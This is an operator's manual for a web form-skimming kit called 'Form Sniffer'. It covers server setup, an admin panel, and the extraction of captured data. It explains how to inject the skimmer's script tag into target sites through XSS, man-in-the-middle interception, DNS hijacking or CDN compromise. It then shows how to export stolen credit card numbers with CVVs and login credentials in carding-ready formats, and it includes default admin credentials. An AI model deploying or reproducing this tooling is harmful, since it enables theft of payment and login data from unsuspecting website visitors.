╔══════════════════════════════════════════════════════════════════════╗
║           FORM SNIFFER - DEPLOYMENT & USAGE GUIDE                   ║
║                      Version 2.0                                     ║
╚══════════════════════════════════════════════════════════════════════╝

═══════════════════════════════════════════════════════════════════════
 TABLE OF CONTENTS
═══════════════════════════════════════════════════════════════════════
1. Requirements
2. Installation Steps
3. Configuration
4. Deploying the Sniffer
5. Using the Admin Panel
6. Data Extraction
7. Troubleshooting
8. Security Best Practices

═══════════════════════════════════════════════════════════════════════
 1. REQUIREMENTS
═══════════════════════════════════════════════════════════════════════

Server Requirements:
✓ PHP 7.4 or higher
✓ MySQL 5.7 or higher (or MariaDB 10.2+)
✓ Apache/Nginx web server
✓ SSL Certificate (HTTPS recommended)
✓ PHP Extensions: PDO, PDO_MySQL, JSON, OpenSSL

Recommended:
• 1GB+ RAM
• 10GB+ disk space
• CentOS 7+, Ubuntu 18.04+, or similar

═══════════════════════════════════════════════════════════════════════
 2. INSTALLATION STEPS
═══════════════════════════════════════════════════════════════════════

STEP 1: Upload Files
───────────────────────────────────────────────────────────────────────
Upload all files to your web server:
  /var/www/html/sniffer/   (or your web root)

Files to upload:
  • admin.php
  • collect.php
  • config.php
  • config_loader.php
  • login.php
  • logout.php
  • export.php
  • sniffer.js
  • style.css
  • database.sql
  • .env.example
  • /api/ folder (all files)

STEP 2: Create Database
───────────────────────────────────────────────────────────────────────
Method A: Using MySQL Command Line
1. Login to MySQL:
   mysql -u root -p

2. Import the database:
   source /path/to/database.sql

Method B: Using phpMyAdmin
1. Open phpMyAdmin
2. Click "Import"
3. Choose database.sql file
4. Click "Go"

Method C: Manual Command
   mysql -u root -p < database.sql

STEP 3: Configure Environment
───────────────────────────────────────────────────────────────────────
1. Copy .env.example to .env:
   cp .env.example .env

2. Edit .env file:
   nano .env

3. Update these settings:

   # Database Configuration (REQUIRED)
   DB_HOST=localhost
   DB_NAME=form_sniffer
   DB_USER=your_database_username
   DB_PASS=your_database_password

   # Application URL (REQUIRED)
   BASE_URL=https://yourdomain.com

   # Security (Optional but recommended)
   APP_DEBUG=false
   RATE_LIMIT_REQUESTS=100

4. Save and close (Ctrl+X, Y, Enter)

STEP 4: Set File Permissions
───────────────────────────────────────────────────────────────────────
chmod 755 /var/www/html/sniffer/
chmod 644 /var/www/html/sniffer/*.php
chmod 644 /var/www/html/sniffer/*.js
chmod 644 /var/www/html/sniffer/*.css
chmod 600 /var/www/html/sniffer/.env
mkdir /var/www/html/sniffer/logs
chmod 755 /var/www/html/sniffer/logs

STEP 5: Configure Sniffer JavaScript
───────────────────────────────────────────────────────────────────────
Edit sniffer.js:

const CONFIG = {
    endpoint: 'https://yourdomain.com/collect.php',  // ← Change this!
    timeout: 5000,
    retries: 2,
};

Save the file.

STEP 6: Test Installation
───────────────────────────────────────────────────────────────────────
1. Open browser: https://yourdomain.com/admin.php
2. Should redirect to login page
3. Login with:
   Username: admin
   Password: Kontolodon123@

4. If you see the dashboard, installation is complete!

STEP 7: Change Default Password (IMPORTANT!)
───────────────────────────────────────────────────────────────────────
1. Login to admin panel
2. Click user avatar (top right)
3. Click "Change Password"
4. Enter new secure password
5. Save changes

═══════════════════════════════════════════════════════════════════════
 3. CONFIGURATION
═══════════════════════════════════════════════════════════════════════

All configuration is done in .env file:

DATABASE SETTINGS:
──────────────────
DB_HOST=localhost          # Database server
DB_PORT=3306               # MySQL port (default: 3306)
DB_NAME=form_sniffer       # Database name
DB_USER=root               # Database username
DB_PASS=                   # Database password

SECURITY SETTINGS:
──────────────────
SESSION_LIFETIME=3600      # Session timeout (1 hour)
RATE_LIMIT_REQUESTS=100    # Max requests per hour per IP
MAX_DATA_SIZE=1048576      # Max payload size (1MB)

APPLICATION SETTINGS:
─────────────────────
APP_ENV=production         # Environment (production/development)
APP_DEBUG=false            # Debug mode (false for production)
BASE_URL=https://yourdomain.com

FEATURE FLAGS:
──────────────
ENABLE_EXPORT=true         # Allow data export
ENABLE_BULK_OPERATIONS=true  # Allow bulk actions

═══════════════════════════════════════════════════════════════════════
 4. DEPLOYING THE SNIFFER
═══════════════════════════════════════════════════════════════════════

METHOD 1: Direct Script Injection
───────────────────────────────────────────────────────────────────────
Inject into target website's HTML:

<script src="https://yourdomain.com/sniffer.js"></script>

Best places to inject:
• Before </head> tag
• After <body> tag
• In footer template
• Via browser extension

METHOD 2: XSS Vulnerability
───────────────────────────────────────────────────────────────────────
If target has XSS vulnerability:

<script src="https://yourdomain.com/sniffer.js"></script>

METHOD 3: Man-in-the-Middle
───────────────────────────────────────────────────────────────────────
Use proxy/interceptor to inject script into HTTP traffic.

METHOD 4: DNS Hijacking
───────────────────────────────────────────────────────────────────────
Modify DNS to serve malicious content with injected script.

METHOD 5: CDN Compromise
───────────────────────────────────────────────────────────────────────
If you control a CDN or library they use, inject there.

VERIFICATION:
─────────────
After injection, open browser console (F12) on target site:
• Should see: FormTracker object in console
• Test by submitting a form
• Check admin panel for captured data

═══════════════════════════════════════════════════════════════════════
 5. USING THE ADMIN PANEL
═══════════════════════════════════════════════════════════════════════

DASHBOARD OVERVIEW:
───────────────────────────────────────────────────────────────────────
┌─────────────────────────────────────────────────────────────────────┐
│  Statistics Cards:                                                  │
│  • Today's Submissions - Number of captures today                  │
│  • This Week - Last 7 days                                         │
│  • Unique Pages - Different URLs captured                          │
│  • Unique Visitors - Different IP addresses                        │
└─────────────────────────────────────────────────────────────────────┘

SEARCH & FILTER:
───────────────────────────────────────────────────────────────────────
1. Search Box:
   • Search by URL, email, or any field
   • Real-time search (types as you go)

2. Page Filter:
   • Filter by specific website/page
   • Shows top 5 captured pages

3. Date Range:
   • Filter by date range
   • Select start and end date

4. Click "Apply Filters" to search

VIEWING SUBMISSIONS:
───────────────────────────────────────────────────────────────────────
Each row shows:
• ID - Unique submission number
• Page URL - Where form was submitted
• Form Data - Preview of captured fields
• Device - Desktop/Mobile/Tablet + Browser
• Location - IP, Country, City
• Time - When captured

ACTIONS PER ROW:
───────────────────────────────────────────────────────────────────────
👁 View - Full details modal
📋 Copy - Quick copy to clipboard (smart format)
🗑 Delete - Remove submission

═══════════════════════════════════════════════════════════════════════
 6. DATA EXTRACTION
═══════════════════════════════════════════════════════════════════════

SINGLE ITEM EXTRACTION:
───────────────────────────────────────────────────────────────────────
1. Click 📋 Copy button next to any row
2. Data is auto-formatted based on type:
   
   • Credit Cards:
     4532123456789010|12|2027|123

   • Login Credentials:
     user@email.com:password123

   • Other Data:
     JSON format

BULK EXTRACTION:
───────────────────────────────────────────────────────────────────────
1. Check boxes next to items you want
2. OR click checkbox in header to select all
3. Use bulk action buttons:

   [Copy Selected] - Copy all to clipboard
   [Export CSV] - Download as CSV
   [Export JSON] - Download as JSON
   [Delete Selected] - Remove selected

EXPORT FORMATS:
───────────────────────────────────────────────────────────────────────
CSV Format:
───────────
ID,Date,Card_Number,Expiry,CVV,Email,Password,IP,Country
1,2026-02-16,4532123456789010,12/2027,123,user@email.com,pass123,192.168.1.1,US

JSON Format:
────────────
[{
  "id": 1,
  "card_number": "4532123456789010",
  "expiry": "12/2027",
  "cvv": "123",
  "email": "user@email.com",
  "captured_at": "2026-02-16 20:15:45"
}]

QUICK COPY FORMATS:
───────────────────────────────────────────────────────────────────────
The system auto-detects data type:

Credit Card → 4532123456789010|12|2027|123|John Doe
Login       → user@email.com:password123
Generic     → Full JSON

═══════════════════════════════════════════════════════════════════════
 7. TROUBLESHOOTING
═══════════════════════════════════════════════════════════════════════

PROBLEM: "Database connection failed"
SOLUTION:
  • Check .env file exists
  • Verify DB credentials in .env
  • Ensure MySQL is running
  • Test: mysql -u username -p database_name

PROBLEM: "No data appearing in dashboard"
SOLUTION:
  • Check collect.php is accessible
  • Verify sniffer.js endpoint URL is correct
  • Check browser console for JavaScript errors
  • Test: curl -X POST https://yourdomain.com/collect.php

PROBLEM: "404 Not Found on admin.php"
SOLUTION:
  • Verify files uploaded correctly
  • Check file permissions (chmod 644)
  • Verify web server configuration

PROBLEM: "Rate limit exceeded"
SOLUTION:
  • Increase RATE_LIMIT_REQUESTS in .env
  • Clear rate_limits table: TRUNCATE TABLE rate_limits;

PROBLEM: "Can't login to admin panel"
SOLUTION:
  • Default credentials: admin/Kontolodon123@
  • Reset password in database:
    UPDATE users SET password='$2y$10$QupuOffI9tWrJOltUu4EP.2/bYJT5vjNSECuxeews/.6DbxxPm5E2' WHERE username='admin';
  • Password will be: Kontolodon123@

PROBLEM: "Sniffer not capturing forms"
SOLUTION:
  • Check sniffer.js is loading (Network tab in browser)
  • Verify endpoint URL in sniffer.js
  • Check CORS settings
  • Ensure target site doesn't block the script

PROBLEM: "Permission denied errors"
SOLUTION:
  • Fix file permissions:
    chmod 755 /var/www/html/sniffer/
    chmod 644 *.php *.js *.css
    chmod 600 .env
    mkdir logs && chmod 755 logs

═══════════════════════════════════════════════════════════════════════
 8. SECURITY BEST PRACTICES
═══════════════════════════════════════════════════════════════════════

ESSENTIAL SECURITY:
───────────────────────────────────────────────────────────────────────
✓ Change default admin password immediately
✓ Use HTTPS (SSL certificate required)
✓ Restrict admin panel access by IP
✓ Use strong database passwords
✓ Keep .env file secure (chmod 600)
✓ Regular backups
✓ Monitor access logs

RECOMMENDED SECURITY:
───────────────────────────────────────────────────────────────────────
• Rename admin.php to something obscure (e.g., x47f9a.php)
• Use VPN for admin access
• Enable 2FA if possible
• Regularly update PHP and MySQL
• Use fail2ban to block brute force
• Implement IP whitelist
• Regular security audits

HIDE ADMIN PANEL:
───────────────────────────────────────────────────────────────────────
1. Rename admin.php:
   mv admin.php secret_dashboard_xyz.php

2. Update login.php redirect
3. Bookmark new URL
4. Don't share the URL

IP WHITELIST (.htaccess):
───────────────────────────────────────────────────────────────────────
Create .htaccess in admin directory:

Order Deny,Allow
Deny from all
Allow from YOUR.IP.ADDRESS.HERE
Allow from 203.0.113.0/24

DATABASE SECURITY:
───────────────────────────────────────────────────────────────────────
• Use separate database user (not root)
• Grant only necessary privileges
• Use strong passwords (20+ chars)
• Bind MySQL to localhost only
• Disable remote MySQL access

DATA RETENTION:
───────────────────────────────────────────────────────────────────────
Clean old data regularly:

DELETE FROM form_submissions WHERE created_at < DATE_SUB(NOW(), INTERVAL 90 DAY);

Or use stored procedure:
CALL sp_cleanup_old_data(90);

═══════════════════════════════════════════════════════════════════════
 QUICK REFERENCE COMMANDS
═══════════════════════════════════════════════════════════════════════

Import Database:
mysql -u root -p < database.sql

Copy .env:
cp .env.example .env

Set Permissions:
chmod 600 .env
chmod 755 logs

View Logs:
tail -f logs/app.log

Clean Old Data:
mysql -u username -p database_name -e "CALL sp_cleanup_old_data(90);"

Backup Database:
mysqldump -u username -p form_sniffer > backup_$(date +%Y%m%d).sql

Restore Database:
mysql -u username -p form_sniffer < backup_20260216.sql

═══════════════════════════════════════════════════════════════════════
 SUPPORT & UPDATES
═══════════════════════════════════════════════════════════════════════

For authorized D1337 SOVEREIGN LABS personnel only.

Version: 2.0.0
Last Updated: February 16, 2026

═══════════════════════════════════════════════════════════════════════